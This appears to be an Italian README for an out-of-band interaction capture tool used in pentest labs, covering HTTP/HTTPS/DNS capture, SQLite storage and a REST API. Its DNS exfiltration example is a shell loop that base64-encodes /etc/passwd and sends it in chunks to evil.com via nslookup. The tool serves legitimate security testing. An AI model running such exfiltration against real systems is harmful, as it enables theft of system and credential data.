Alternativa gratuita a Burp Collaborator - cattura di interazioni OOB (HTTP/HTTPS/DNS) con SQLite e riassemblaggio dell'exfil
Alternativa gratuita e open-source a Burp Collaborator per lab di penetration testing
Cattura di interazioni Out-of-Band (OOB) · HTTP/HTTPS · DNS · SQLite · Riassemblaggio exfil
Phantom Grid è uno strumento self-hosted per la cattura di interazioni OOB (Out-of-Band) — un'alternativa gratuita a Burp Collaborator per risolvere lab di penetration testing (PortSwigger Web Security Academy, HackTheBox, TryHackMe, ecc.).
| Funzionalità | Descrizione |
|---|---|
| Cattura HTTP + HTTPS | Dual-stack con certificati TLS self-signed generati automaticamente |
| Cattura DNS | Server DNS integrato sulla porta 53 |
| Riassemblaggio DNS Exfil | Riassemblaggio automatico dei chunk da esfiltrazione DNS multi-parte |
| Persistenza SQLite | Tutti i dati sopravvivono ai riavvii del server (modalità WAL per le prestazioni) |
| 40+ Template di Payload | SSRF, XXE, SQLi OOB, CMDi, SSTI, DNS exfil — pronti da copiare |
| Dashboard Tattica | Interfaccia command center con monitoraggio in tempo reale |
| Docker Ready | Deployment con un solo comando |
| REST API | API completa per la gestione di token/interazioni/exfil |
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt
# HTTP only
python server/server.py
# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https
# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d
python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads
┌──────────────────────────────────────────────────────────────┐
│ PHANTOM GRID v2.0 │
│ │
│ ┌─────────────┐ ┌─────────────────────────────────┐ │
│ │ Dashboard │─API─▶│ Flask Server │ │
│ │ (React) │ │ │ │
│ └─────────────┘ │ :9090 HTTP capture + API │ │
│ │ :9443 HTTPS capture + API │ │
│ ┌─────────────┐ │ :53 DNS capture │ │
│ │ Target App │─────▶│ │ │
│ └─────────────┘ └──────────┬──────────────────────┘ │
│ │ │
│ ┌──────────▼──────────┐ │
│ │ SQLite Database │ │
│ │ phantom_grid.db │ │
│ │ │ │
│ │ tokens │ │
│ │ interactions │ │
│ │ dns_exfil_sessions │ │
│ │ dns_exfil_chunks │ │
│ └─────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────┘
Le applicazioni moderne spesso bloccano le richieste mixed-content (http:// da pagine https://). Phantom Grid v2.0 esegue HTTPS insieme a HTTP.
python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443
python server/server.py --https \
--cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
--key /etc/letsencrypt/live/yourdomain/privkey.pem
python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically
Phantom Grid riassembla automaticamente i dati di esfiltrazione DNS suddivisi in chunk. Questo è fondamentale per estrarre payload di grandi dimensioni che devono essere suddivisi su più lookup DNS (label limitate a 63 byte).
| Formato | Esempio | Caso d'Uso |
|---|---|---|
| Semplice | data.TOKEN.domain | Esfiltrazione di un singolo valore |
| Indicizzato | 0.chunk1.TOKEN.domain | Sessione automatica, chunk ordinati |
| Taggato | sess1.0.chunk1.TOKEN.domain | Sessione nominata con ordinamento |
| Segnale di fine | end.sess1.TOKEN.domain | Marca la sessione come completata |
/etc/passwd via DNSSul target:
# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
chunk=$(echo "$data" | cut -c1-50)
data=$(echo "$data" | cut -c51-)
nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1
Visualizzare i dati riassemblati:
curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil
Risposta:
[{
"session_tag": "exfil",
"completed": 1,
"chunk_count": 12,
"reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]
Tutti i dati sono memorizzati in phantom_grid.db utilizzando la modalità SQLite WAL per prestazioni di lettura/scrittura concorrenti.
phantom_grid.db
├── tokens — Token metadata
├── interactions — All HTTP/DNS captures
├── dns_exfil_sessions — Grouped exfil sessions
└── dns_exfil_chunks — Individual exfil data chunks
I dati sopravvivono ai riavvii del server. Esegui il backup copiando phantom_grid.db.
| Metodo | Endpoint | Descrizione |
|---|---|---|
GET | /api/tokens | Elenca tutti i token con statistiche |
POST | /api/tokens | Crea token {"label": "...", "notes": "..."} |
PATCH | /api/tokens/<id> | Aggiorna label/note del token |
DELETE | /api/tokens/<id> | Elimina token + tutti i dati (CASCADE) |
| Metodo | Endpoint | Descrizione |
|---|---|---|
GET | /api/tokens/<id>/interactions?limit=&offset= | Ottieni le interazioni del token |
DELETE | /api/tokens/<id>/interactions | Cancella le interazioni |
GET | /api/log?limit= | Log globale (tutti i token) |
GET | /api/poll?since=<ISO> | Interroga nuove interazioni |
| Metodo | Endpoint | Descrizione |
|---|---|---|
GET | /api/tokens/<id>/exfil | Ottieni le sessioni exfil con dati riassemblati |
| Metodo | Endpoint | Descrizione |
|---|---|---|
GET | /api/stats | Statistiche globali (conteggi, dimensione DB) |
GET | /health | Controllo di stato |